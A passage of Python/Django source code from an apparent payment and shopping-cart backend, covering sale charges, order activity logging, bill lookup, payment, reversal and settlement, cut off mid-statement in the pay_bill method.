SaleCharge.objects.filter(Q(min_amount__lt=balance_bf,max_amount__gt=balance_bf,credit=False),\\\n\t\t\t\t\t\tQ(Q(product_display=item.product_item.product_display)|Q(product_display=None)),\\\n\t\t\t\t\t\tQ(Q(product_type=item.product_item.product_type)|Q(product_type=None)),\\\n\t\t\t\t\t\tQ(Q(institution=item.product_item.institution)|Q(institution=None)),\\\n\t\t\t\t\t\tQ(Q(gateway=gateway)|Q(gateway=None)))\n\n\t\tfor sc in sale_charge:\n\t\t\tproduct_item = sc.sale_charge_type.product_item\n\t\t\tcharge = Decimal(0)\n\t\t\tif sc.is_percentage:\n\t\t\t\tcharge = charge + ((sc.charge_value/100)*Decimal(item.total))\n\t\t\telse:\n\t\t\t\tcharge = charge+sc.charge_value\n\n\t\t\tif sc.per_item:\n\t\t\t\tsale_charge_item = self.cart_entry(sc.sale_charge_type.product_item, payload, 1, charge, charge)\n\t\t\t\t#item = CartItem.objects.get(id=cart_item_id)\n\t\t\t\tbalance_bf = self.get_balance_bf(sale_charge_item, purchase_order, balance_bf)\n\t\t\t\tbill_manager = self.bill_entry(sale_charge_item, purchase_order, balance_bf, payload)\n\n\t\t\telse:\n\t\t\t\tif bill_manager.order.cart_item.filter(product_item=product_item).exists():\n\t\t\t\t\tlgr.info('Sale Charge Already Exists')\n\t\t\t\telse:\n\t\t\t\t\tsale_charge_item = self.cart_entry(sc.sale_charge_type.product_item, payload, 1, charge, charge)\n\t\t\t\t\t#item = CartItem.objects.get(id=cart_item_id)\n\t\t\t\t\tbalance_bf = self.get_balance_bf(sale_charge_item, purchase_order, balance_bf)\n\t\t\t\t\tbill_manager = self.bill_entry(sale_charge_item, purchase_order, balance_bf, payload)\n\n\t\treturn balance_bf\n\n\tdef transaction_payload(self, payload):\n\t\tnew_payload, transaction, count = {}, None, 1\n\t\tfor k, v in payload.items():\n\t\t\tkey = k.lower()\n\t\t\tif 'card' not in key and 'credentials' not in key and 'new_pin' not in key and \\\n\t\t\t 'validate_pin' not in key and 'password' not in key and 'confirm_password' not in key and \\\n\t\t\t 'pin' not in key and 'access_level' not in key and \\\n\t\t\t 'response_status' not in key and 'sec_hash' not in key and 'ip_address' not in key and \\\n\t\t\t 'service' not in key and key != 'lat' and key != 'lng' and \\\n\t\t\t key != 'chid' and 'session' not in key and 'csrf_token' not in key and \\\n\t\t\t 'csrfmiddlewaretoken' not in key and 'gateway_host' not in key and \\\n\t\t\t 'gateway_profile' not in key and 'transaction_timestamp' not in key and \\\n\t\t\t 'action_id' not in key and 'bridge__transaction_id' not in key and \\\n\t\t\t 'merchant_data' not in key and 'signedpares' not in key and \\\n\t\t\t key != 'gpid' and key != 'sec' and \\\n\t\t\t key not in ['ext_product_id','vpc_securehash','currency','amount'] and \\\n\t\t\t 'institution_id' not in key and key != 'response' and key != 'input' and \\\n\t\t\t key 
!= 'repeat_bridge_transaction' and key != 'transaction_auth':\n\n\t\t\t\tif count <= 30:\n\t\t\t\t\tnew_payload[str(k)[:30] ] = str(v)[:40]\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\t\tcount = count+1\n\n\t\treturn json.dumps(new_payload)\n\n\nclass System(Wrappers):\n\n\tdef update_outgoing_payment(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\t\t\tpurchase_order.outgoing_payment=Outgoing.objects.get(id=payload['paygate_outgoing_id'])\n\t\t\tpurchase_order.save()\n\n\t\t\tpayload['response'] = 'Outgoing Payment Updated'\n\t\t\tpayload['response_status'] = '00'\n\t\texcept Exception as e:\n\t\t\tpayload['response'] = str(e)\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Update Outgoing Payment: %s\" % e)\n\n\t\treturn payload\n\n\n\n\tdef log_order_activity(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\ttry:\n\t\t\t\torder_product = OrderProduct.objects.filter(service__name=payload['SERVICE'])\n\n\t\t\t\tlgr.info('Got HEre')\n\t\t\t\tif 'currency' in payload.keys():\n\t\t\t\t\torder_product = order_product.filter(Q(currency__code=payload['currency'])|Q(currency=None))\n\n\t\t\t\tif 'payment_method' in payload.keys():\n\t\t\t\t\torder_product = order_product.filter(Q(payment_method__name=payload['payment_method'])\\\n\t\t\t\t\t\t\t\t|Q(payment_method=None))\n\n\t\t\t\tif 'product_type_id' in payload.keys():\n\t\t\t\t\torder_product = order_product.filter(Q(product_type__id=payload['product_type_id'])\\\n\t\t\t\t\t\t\t\t|Q(product_type=None))\n\n\t\t\t\tif 'product_item_id' in payload.keys():\n\t\t\t\t\tproduct_item = ProductItem.objects.get(id=payload['product_item_id'])\n\t\t\t\t\torder_product = order_product.filter(Q(product_type=product_item.product_type)\\\n\t\t\t\t\t\t\t\t|Q(product_type=None))\n\n\t\t\t\tif 'ext_product_id' in payload.keys():\n\t\t\t\t\torder_product = order_product.filter(ext_product_id=payload['ext_product_id'])\n\n\t\t\t\tlgr.info('Got HEre')\n\t\t\t\tif order_product.exists():\n\t\t\t\t\t#log \n\t\t\t\t\tresponse_status = ResponseStatus.objects.get(response='DEFAULT')\n\t\t\t\t\tstatus = TransactionStatus.objects.get(name=\"CREATED\")\n\t\t\t\t\torder = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\t\t\t\t\tchannel = Channel.objects.get(id=payload['chid'])\n\t\t\t\t\tlgr.info('Got HEre')\n\n\t\t\t\t\treference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else ''\n\t\t\t\t\t\n\t\t\t\t\torder_activity = OrderActivity(order_product=order_product[0], order=order, transaction_reference=reference,\\\n\t\t\t\t\t\t\tgateway_profile=gateway_profile, request=self.transaction_payload(payload),\\\n\t\t\t\t\t\t\tresponse_status=response_status, sends=0, status=status, \\\n\t\t\t\t\t\t\tchannel=channel, gateway=gateway_profile.gateway)\n\n\t\t\t\t\tlgr.info('Got HEre')\n\t\t\t\t\tif 'scheduled_send' in payload.keys() and payload['scheduled_send'] not in [\"\",None]:\n\t\t\t\t\t\ttry:date_obj = datetime.strptime(payload[\"scheduled_send\"], '%d/%m/%Y %I:%M %p')\n\t\t\t\t\t\texcept: date_obj = None\n\t\t\t\t\t\tif date_obj is not None:\t\t\n\t\t\t\t\t\t\tprofile_tz = pytz.timezone(gateway_profile.profile.timezone)\n\t\t\t\t\t\t\tscheduled_send = pytz.timezone(gateway_profile.profile.timezone).localize(date_obj)\n\t\t\t\t\t\t\tlgr.info(\"Send Scheduled: %s\" % 
scheduled_send)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tscheduled_send = timezone.now()+timezone.timedelta(seconds=1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tscheduled_send = timezone.now()+timezone.timedelta(seconds=1)\n\n\t\t\t\t\torder_activity.scheduled_send = scheduled_send\n\n\t\t\t\t\tlgr.info('Got HEre')\n\t\t\t\t\tif 'ext_inbound_id' in payload.keys() and payload['ext_inbound_id'] not in [\"\",None]:\n\t\t\t\t\t\torder_activity.ext_inbound_id = payload['ext_inbound_id']\n\t\t\t\t\telif 'bridge__transaction_id' in payload.keys():\n\t\t\t\t\t\torder_activity.ext_inbound_id = payload['bridge__transaction_id']\n\n\t\t\t\t\tif 'currency' in payload.keys() and payload['currency'] not in [\"\",None]:\n\t\t\t\t\t\torder_activity.currency = Currency.objects.get(code=payload['currency'])\n\t\t\t\t\tif 'amount' in payload.keys() and payload['amount'] not in [\"\",None]:\n\t\t\t\t\t\torder_activity.amount = Decimal(payload['amount'])\n\t\t\t\t\tif 'charge' in payload.keys() and payload['charge'] not in [\"\",None]:\n\t\t\t\t\t\torder_activity.charge = Decimal(payload['charge'])\n\n\t\t\t\t\torder_activity.save()\n\n\t\t\t\t\tlgr.info('Got HEre')\n\t\t\t\t\tpayload['response'] = 'Order Activity Logged'\n\t\t\t\t\tpayload['response_status'] = '00'\n\t\t\t\telse:\n\t\t\t\t\tpayload['response'] = 'Order Activity product not found'\n\t\t\t\t\tpayload['response_status'] = '92'\n\n\t\t\texcept ProductItem.DoesNotExist:\n\t\t\t\tlgr.info(\"ProdutItem Does not Exist\")\n\t\t\t\tpayload['response_status'] = '25'\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Order Activity: %s\" % e)\n\t\treturn payload\n\n\n\tdef settle_order_charges(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tamount = Decimal(payload['amount'])\n\t\t\tcharge = Decimal(0)\n\n\t\t\tif 'institution_id' in payload.keys():\n\t\t\t\tcharge_list = OrderCharge.objects.filter(institution__id=payload['institution_id'], min_amount__lte=Decimal(amount), order_product__service__name=payload['SERVICE'],\\\n\t\t\t\t\t\tmax_amount__gte=Decimal(amount))\n\t\t\telif 'product_item_id' in payload.keys():\n\t\t\t\tproduct_item = ProductItem.objects.get(id=payload['product_item_id'])\n\t\t\t\tpayload['institution_id'] = product_item.institution.id\n\t\t\t\tcharge_list = OrderCharge.objects.filter(institution=product_item.institution, min_amount__lte=Decimal(amount), order_product__service__name=payload['SERVICE'],\\\n\t\t\t\t\t\tmax_amount__gte=Decimal(amount))\n\t\t\telse:\n\t\t\t\tcharge_list = OrderCharge.objects.none()\n\n\n\t\t\tif 'payment_method' in payload.keys():\n\t\t\t\tcharge_list = charge_list.filter(Q(payment_method__name=payload['payment_method'])|Q(payment_method=None))\n\n\t\t\tfor c in charge_list:\n\t\t\t\tif c.is_percentage:\n\t\t\t\t\tcharge = charge + ((c.charge_value/100)*Decimal(amount))\n\t\t\t\telse:\n\t\t\t\t\tcharge = charge+c.charge_value\t\t\n\n\t\t\tpayload['amount'] = amount - charge\n\t\t\tpayload['charge'] = charge\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload['response'] = \"Order Charges Settled\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"error settle order charges: %s\" % e)\n\n\t\treturn payload\n\n\n\tdef settle_paid_orders(self, payload, node_info):\n\t\ttry:\n\t\t\t\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tbill_manager_list = 
BillManager.objects.filter(order__status__name='PAID',order__cart_item__status__name='PAID')\n\t\t\tif gateway_profile.institution:\n\t\t\t\tbill_manager_list = bill_manager_list.filter(order__cart_item__product_item__institution=gateway_profile.institution)\n\t\t\telif 'institution_id' in payload.keys():\n\t\t\t\tbill_manager_list = bill_manager_list.filter(order__cart_item__product_item__institution__id=payload['institution_id'])\n\t\t\telse:\n\t\t\t\tbill_manager_list = bill_manager_list.none()\n\n\t\t\tif 'product_type_list' in payload.keys():\n\t\t\t\t#product_type_list = '23,65,123,35,563,34,42'\n\t\t\t\tbill_manager_list = bill_manager_list.filter(order__cart_item__product_item__product_type__id__in=[p for p in payload['product_type_list'].split(',') if p])\n\n\t\t\tsettled_amount = Decimal(0)\n\t\t\tif bill_manager_list.exists():\n\t\t\t\tsettled_amount = bill_manager_list.aggregate(Sum('balance_bf'))['balance_bf__sum']\n\t\t\t\tsettle_orders.delay(np.unique(np.asarray(bill_manager_list.values_list('order__id',flat=True))).tolist())\n\n\t\t\tpayload['settled_amount'] = settled_amount\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload['response'] = \"Settled: %s\" % settled_amount\n\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"error settling paid ordes: %s\" % e)\n\n\t\treturn payload\n\n\tdef create_sale_charge(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\t\t\tproduct_item = ProductItem.objects.get(id=payload['product_item_id'])\n\n\t\t\tsale_charge_type = SaleChargeType(name=product_item.name, description=product_item.description,\\\n\t\t\t\t\t\t\tproduct_item=product_item)\n\t\t\tsale_charge_type.save()\n\t\t\tsale_charge = SaleCharge(sale_charge_type=sale_charge_type,description=product_item.description)\n\t\t\tif 'credit' in payload.keys() and payload['credit']:\n\t\t\t\tsale_charge.credit = True\n\n\t\t\tsale_charge.min_amount = payload['min_amount'] if 'min_amount' in payload.keys() else 0\n\t\t\tsale_charge.max_amount = payload['max_amount'] if 'max_amount' in payload.keys() else 999999\n\t\t\tsale_charge.charge_value = payload['charge_value'] if 'charge_value' in payload.keys() else 0\n\n\t\t\tif 'is_percentage' in payload.keys() and payload['is_percentage']:\n\t\t\t\tsale_charge.is_percentage = True\n\t\t\tif 'main_location' in payload.keys():\n\t\t\t\tcoordinates = payload['main_location']\n\t\t\t\tlongitude, latitude = coordinates.split(',', 1)\n\t\t\t\ttrans_point = Point(float(longitude), float(latitude))\n\t\t\t\tsale_charge.main_location = trans_point\n\n\t\t\tif 'min_distance' in payload.keys(): sale_charge.min_distance = payload['min_distance']\n\t\t\tif 'max_distance' in payload.keys(): sale_charge.max_distance = payload['max_distance']\n\t\t\tif 'charge_per_km' in payload.keys(): sale_charge.charge_per_km = payload['charge_per_km']\n\t\t\tif 'per_item' in payload.keys() and payload['per_item']:\n\t\t\t\tsale_charge.max_distance = payload['max_distance']\n\n\t\t\tsale_charge.save()\n\n\t\t\tsale_charge.product_display.add(ProductDisplay.objects.get(name='SHOP'))\n\t\t\tsale_charge.product_type.add(ProductType.objects.get(id=111))\n\t\t\tsale_charge.institution.add(gateway_profile.institution)\n\t\t\tsale_charge.gateway.add(gateway_profile.gateway)\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Sale Charge Created\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = 
'96'\n\t\t\tlgr.info(\"Error on Creating Sale Charge: %s\" % e)\n\t\treturn payload\n\n\n\tdef delete_cart_item_details(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tcart_item = CartItem.objects.get(id=payload['cart_item_id'],\\\n\t\t\t\t\t\t product_item__institution__gateway=gateway_profile.gateway)\n\n\t\t\tpayload['total'] = cart_item.total\n\t\t\tpayload['sub_total'] = cart_item.sub_total\n\t\t\tpayload['quantity'] = cart_item.quantity\n\t\t\tpayload['price'] = cart_item.price\n\t\t\tpayload['product_item_id'] = cart_item.product_item.id\n\t\t\tpayload['cat_item_status'] = cart_item.status.name\n\t\t\tpayload['details'] = json.loads(cart_item.details)\n\n\n\t\t\tif cart_item.product_item.uneditable:\n\t\t\t\tpayload['trigger'] = 'uneditable_item%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\telse:\n\t\t\t\tpayload['trigger'] = 'editable_item%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Cart Item Details\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Cart Items: %s\" % e)\n\t\treturn payload\n\n\n\tdef update_cart_item_details(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tcart_item = CartItem.objects.get(id=payload['cart_item_id'],\\\n\t\t\t\t\t\t product_item__institution__gateway=gateway_profile.gateway)\n\n\t\t\tpayload['total'] = cart_item.total\n\t\t\tpayload['sub_total'] = cart_item.sub_total\n\t\t\tpayload['quantity'] = cart_item.quantity\n\t\t\tpayload['price'] = cart_item.price\n\t\t\tpayload['product_item_id'] = cart_item.product_item.id\n\t\t\tpayload['cat_item_status'] = cart_item.status.name\n\t\t\tpayload['details'] = json.loads(cart_item.details)\n\n\n\t\t\tif cart_item.product_item.product_type.name == 'Location':\n\t\t\t\tpayload['trigger'] = 'location_item%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\telse:\n\t\t\t\tpayload['trigger'] = 'quantity_item%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Cart Item Details\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Cart Items: %s\" % e)\n\t\treturn payload\n\n\tdef update_cart_item(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tcart_item = CartItem.objects.get(id=payload['cart_item_id'],\\\n\t\t\t\t\t\t product_item__institution__gateway=gateway_profile.gateway)\n\n\t\t\tproduct_item = cart_item.product_item\n\n\t\t\tquantity = Decimal(payload['quantity']) if 'quantity' in payload.keys() else Decimal(1)\n\t\t\tsub_total = Decimal(product_item.unit_cost*quantity).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\ttotal = sub_total\n\n\t\t\tif 'quantity' not in payload.keys() and product_item.variable_unit and 'amount' in payload.keys():\n\t\t\t\tquantity = Decimal(Decimal(payload['amount'])/product_item.unit_cost).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\tsub_total = Decimal(product_item.unit_cost*quantity).quantize(Decimal('.01'), rounding=ROUND_DOWN)\n\t\t\t\ttotal = sub_total\n\n\t\t\tcart_item.quantity = quantity\n\t\t\tcart_item.sub_total = sub_total\n\t\t\tcart_item.total = 
total\n\t\t\tcart_item.pn = False\n\t\t\tcart_item.save()\n\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Updated Cart Item\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Update Cart Item: %s\" % e)\n\t\treturn payload\n\n\tdef delete_cart_item(self, payload, node_info):\n\t\ttry:\n\t\t\tgateway_profile = GatewayProfile.objects.get(id=payload['gateway_profile_id'])\n\n\t\t\tcart_item = CartItem.objects.get(id=payload['cart_item_id'],\\\n\t\t\t\t\t\t product_item__institution__gateway=gateway_profile.gateway)\n\n\t\t\tcart_item.status = CartStatus.objects.get(name='DELETED')\n\t\t\tcart_item.pn = False\n\t\t\tcart_item.save()\n\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Deleted Cart Item\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on Delete Cart Item: %s\" % e)\n\t\treturn payload\n\n\tdef window_event(self, payload, node_info):\n\t\ttry:\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\tpayload[\"response\"] = \"Window Event\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on window event: %s\" % e)\n\t\treturn payload\n\n\n\tdef allow_cash_on_delivery(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'purchase_order_id' in payload.keys() and 'amount' in payload.keys() and 'currency' in payload.keys():\n\t\t\t\tpayload['balance_bf'] = payload['amount']\n\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\tpayload[\"response\"] = \"Allowed: %s %s to cash on delivery\" % (payload['currency'], payload['amount'])\n\t\t\telse:\n\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\tpayload[\"response\"] = \"Bill Detail(s) missing\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on allowing cash on delivery: %s\" % e)\n\t\treturn payload\n\n\n\tdef check_order_status(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'reference' in payload.keys():\n\n\t\t\t\t#An order will ALWAYS have an initial bill manager, hence\n\t\t\t\treference = payload['reference'].strip()\n\t\t\t\tbill_manager_list = BillManager.objects.filter(order__reference__iexact=reference,order__status__name__in=['UNPAID','PAID']).order_by(\"-date_created\")\n\t\t\t\tif bill_manager_list.exists():\n\t\t\t\t\tcart_items = bill_manager_list[0].order.cart_item.all()\n\t\t\t\t\tif cart_items.exists():\n\t\t\t\t\t\t#Takes up the institution with the most products\n\t\t\t\t\t\tproduct_institution = cart_items.values('product_item__institution__id').annotate(Count('product_item__institution__id')).order_by('-product_item__institution__id__count')\n\t\t\t\t\t\tif product_institution.count() == 1:\n\t\t\t\t\t\t\tpayload['institution_id'] = product_institution[0]['product_item__institution__id']\n\t\t\t\t\tpayload['amount'] = str(bill_manager_list[0].balance_bf)\n\t\t\t\t\tpayload['currency'] = bill_manager_list[0].order.currency.code\n\t\t\t\t\tpayload['purchase_order_id'] = bill_manager_list[0].order.id\n\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tif bill_manager_list.filter(order__status__name='UNPAID').exists():\n\t\t\t\t\t\tpayload['trigger'] = 'unpaid_order%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\t\t\t\tpayload[\"response\"] = \"Unpaid Order\"\n\t\t\t\t\telse:\n\t\t\t\t\t\tpayload['trigger'] = 'paid_order%s' % (','+payload['trigger'] if 'trigger' in payload.keys() else '')\n\t\t\t\t\t\tpayload[\"response\"] = \"Paid 
Order\"\n\t\t\t\telse:\n\t\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\t\tpayload[\"response\"] = \"No Purchase Order with given reference\"\n\t\t\telse:\n\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\tpayload[\"response\"] = \"No Purchase Order reference was given\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on pay bill: %s\" % e)\n\t\treturn payload\n\n\n\n\tdef get_bill(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'reference' in payload.keys():\n\n\t\t\t\t#An order will ALWAYS have an initial bill manager, hence\n\t\t\t\treference = payload['reference'].strip()\n\t\t\t\tbill_manager_list = BillManager.objects.filter(order__reference__iexact=reference,order__status__name='UNPAID').order_by(\"-date_created\")\n\t\t\t\tif bill_manager_list.exists():\n\t\t\t\t\tcart_items = bill_manager_list[0].order.cart_item.all()\n\t\t\t\t\tif cart_items.exists():\n\t\t\t\t\t\t#Takes up the institution with the most products\n\t\t\t\t\t\tproduct_institution = cart_items.values('product_item__institution__id').annotate(Count('product_item__institution__id')).order_by('-product_item__institution__id__count')\n\t\t\t\t\t\tif product_institution.count() == 1:\n\t\t\t\t\t\t\tpayload['institution_id'] = product_institution[0]['product_item__institution__id']\n\t\t\t\t\tpayload['amount'] = str(bill_manager_list[0].balance_bf)\n\t\t\t\t\tpayload['currency'] = bill_manager_list[0].order.currency.code\n\t\t\t\t\tpayload['purchase_order_id'] = bill_manager_list[0].order.id\n\t\t\t\t\tpayload[\"response_status\"] = \"00\"\n\t\t\t\t\tpayload[\"response\"] = \"Bill Balance: %s\" % bill_manager_list[0].balance_bf\n\t\t\t\telse:\n\t\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\t\tpayload[\"response\"] = \"No Purchase Order with given reference\"\n\t\t\telse:\n\t\t\t\tpayload[\"response_status\"] = \"25\"\n\t\t\t\tpayload[\"response\"] = \"No Purchase Order reference was given\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on pay bill: %s\" % e)\n\t\treturn payload\n\n\n\n\tdef reverse_pay_bill(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'purchase_order_id' in payload.keys():\n\t\t\t\tpurchase_order = PurchaseOrder.objects.get(id=payload['purchase_order_id'])\n\n\t\t\t\t#Update as unpaid in all cases\n\t\t\t\tstatus = OrderStatus.objects.get(name='UNPAID')\n\t\t\t\tcart_status = CartStatus.objects.get(name='UNPAID')\n\n\t\t\t\tpurchase_order.status = status\n\t\t\t\tpurchase_order.save()\n\t\t\t\tpurchase_order.cart_item.all().update(status=cart_status)\n\n\t\t\t\t#Reverse if a credit (Pay Bill) Exists\n\t\t\t\tbill_manager_list = BillManager.objects.filter(order=purchase_order).order_by(\"-date_created\")[:1]\n\t\t\t\tif bill_manager_list.exists() and bill_manager_list[0].credit:\n\t\t\t\t\torder = bill_manager_list[0].order\n\t\t\t\t\tbalance_bf = bill_manager_list[0].amount + bill_manager_list[0].balance_bf\n\n\t\t\t\t\ttransaction_reference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else None\n\t\t\t\t\tbill_manager = BillManager(credit=False,transaction_reference=transaction_reference,\\\n\t\t\t\t\t\t\taction_reference=payload['action_id'],order=order,\\\n\t\t\t\t\t\t\tamount=balance_bf,\\\n\t\t\t\t\t\t\tbalance_bf=balance_bf)\n\n\t\t\t\t\tbill_manager.save()\n\n\t\t\t\t\tpayload['amount'] = bill_manager.amount\n\t\t\t\t\tpayload['purchase_order_id'] = order.id\n\t\t\t\t\tpayload[\"response\"] = \"Bill Reversed. 
Balance: %s\" % bill_manager.balance_bf\n\t\t\t\telse:\n\t\t\t\t\t#!!IMPORTANT - Or Account would be debitted on no bill\n\t\t\t\t\tpayload['amount'] = Decimal(0)\n\t\t\t\t\tpayload[\"response\"] = \"No Bill to Reverse\"\n\t\t\telse:\n\t\t\t\tpayload['response'] = \"No Order to Reverse\"\n\t\t\t#All are successes\n\t\t\tpayload[\"response_status\"] = \"00\"\n\t\texcept Exception as e:\n\t\t\tpayload['response_status'] = '96'\n\t\t\tlgr.info(\"Error on reverse pay bill: %s\" % e)\n\t\treturn payload\n\n\n\tdef pay_bill(self, payload, node_info):\n\t\ttry:\n\t\t\tif 'reference' in payload.keys():\n\t\t\t\t#An order will ALWAYS have an initial bill manager, hence\n\t\t\t\treference = payload['reference'].strip()\n\n\t\t\t\tbill_manager_list = BillManager.objects.filter(order__reference__iexact=reference,order__status__name='UNPAID', order__expiry__gte=timezone.now()).order_by(\"-date_created\")\n\t\t\t\tif bill_manager_list.exists():\n\t\t\t\t\torder = bill_manager_list[0].order\n\t\t\t\t\tamount = Decimal(payload['balance_bf'])\n\n\t\t\t\t\t#If currency does not match purchase_order currency (FOREX) and replace amount & currency in payload\n\t\t\t\t\tcurrency = Currency.objects.get(code=payload['currency'])\n\t\t\t\t\tif currency != order.currency:\n\t\t\t\t\t\torder_currency = order.currency\n\t\t\t\t\t\tforex = Forex.objects.filter(base_currency=order_currency, quote_currency=currency)\n\t\t\t\t\t\tif forex.exists():\n\t\t\t\t\t\t\tamount = (amount/forex[0].exchange_rate).quantize(Decimal('.01'), rounding=ROUND_UP)\n\t\t\t\t\t\tlgr.info('Forex Calculate balance_bf to %s|from: %s| %s' % (order_currency, currency, amount) )\n\n\t\t\t\t\tif amount > 0:\n\n\t\t\t\t\t\tif bill_manager_list[0].balance_bf <= amount:\n\t\t\t\t\t\t\t#payment balance_bf is greater than outstanding bill\n\t\t\t\t\t\t\tbalance_bf = 0\n\t\t\t\t\t\t\t#transacting amount refers to the deduction for bill amount only\n\t\t\t\t\t\t\ttransacting_amount = bill_manager_list[0].balance_bf\n\t\t\t\t\t\t\t#Resets query so transacting amount must have been captured\n\t\t\t\t\t\t\tstatus = OrderStatus.objects.get(name='PAID')\n\t\t\t\t\t\t\torder.status = status\n\t\t\t\t\t\t\torder.save()\n\t\t\t\t\t\t\torder.cart_item.all().update(status=CartStatus.objects.get(name='PAID'))\n\n\t\t\t\t\t\telse:\n\n\t\t\t\t\t\t\t#payment balance_bf is less than outstanding bill\n\t\t\t\t\t\t\tbalance_bf = bill_manager_list[0].balance_bf - amount\n\n\t\t\t\t\t\t\t#transacting amount refers to the deduction for bill amount only\n\t\t\t\t\t\t\ttransacting_amount = amount\n\n\t\t\t\t\t\ttransaction_reference = payload['bridge__transaction_id'] if 'bridge__transaction_id' in payload.keys() else None\n\t\t\t\t\t\tbill_manager = BillManager(credit=True,transaction_reference=transaction_reference,\\\n\t\t\t\t\t\t\t\taction_reference=payload['action_id'],order=order,\\\n\t\t\t\t\t\t\t\tamount=transacting_amount,\\\n\t\t\t\t\t\t\t\tbalance_bf=Decimal(balance_bf).quantize(Decimal('.01'), rounding=ROUND_DOWN))\n\t\t\t\t\t\tbill_manager.payment_method = PaymentMethod.objects.get(name=payload['payment_method'])\n\n\t\t\t\t\t\tif 'paygate_incoming_id' in payload.keys():\n\t\t\t\t\t\t\tbill_manager.incoming_payment = Incoming.objects.get(id=payload['paygate_incoming_id'])\n\n\t\t\t\t\t\tbill_manager.save()\n\n\n\t\t\t\t\t\tamount = bill_manager.amount\n\t\t\t\t\t\tif currency != order.currency:\n\t\t\t\t\t\t\torder_currency = order.currency\n\t\t\t\t\t\t\tforex = Forex.objects.filter(base_currency=order_currency, quote_currency=currency)\n\t\t\t\t\t\t\tif 
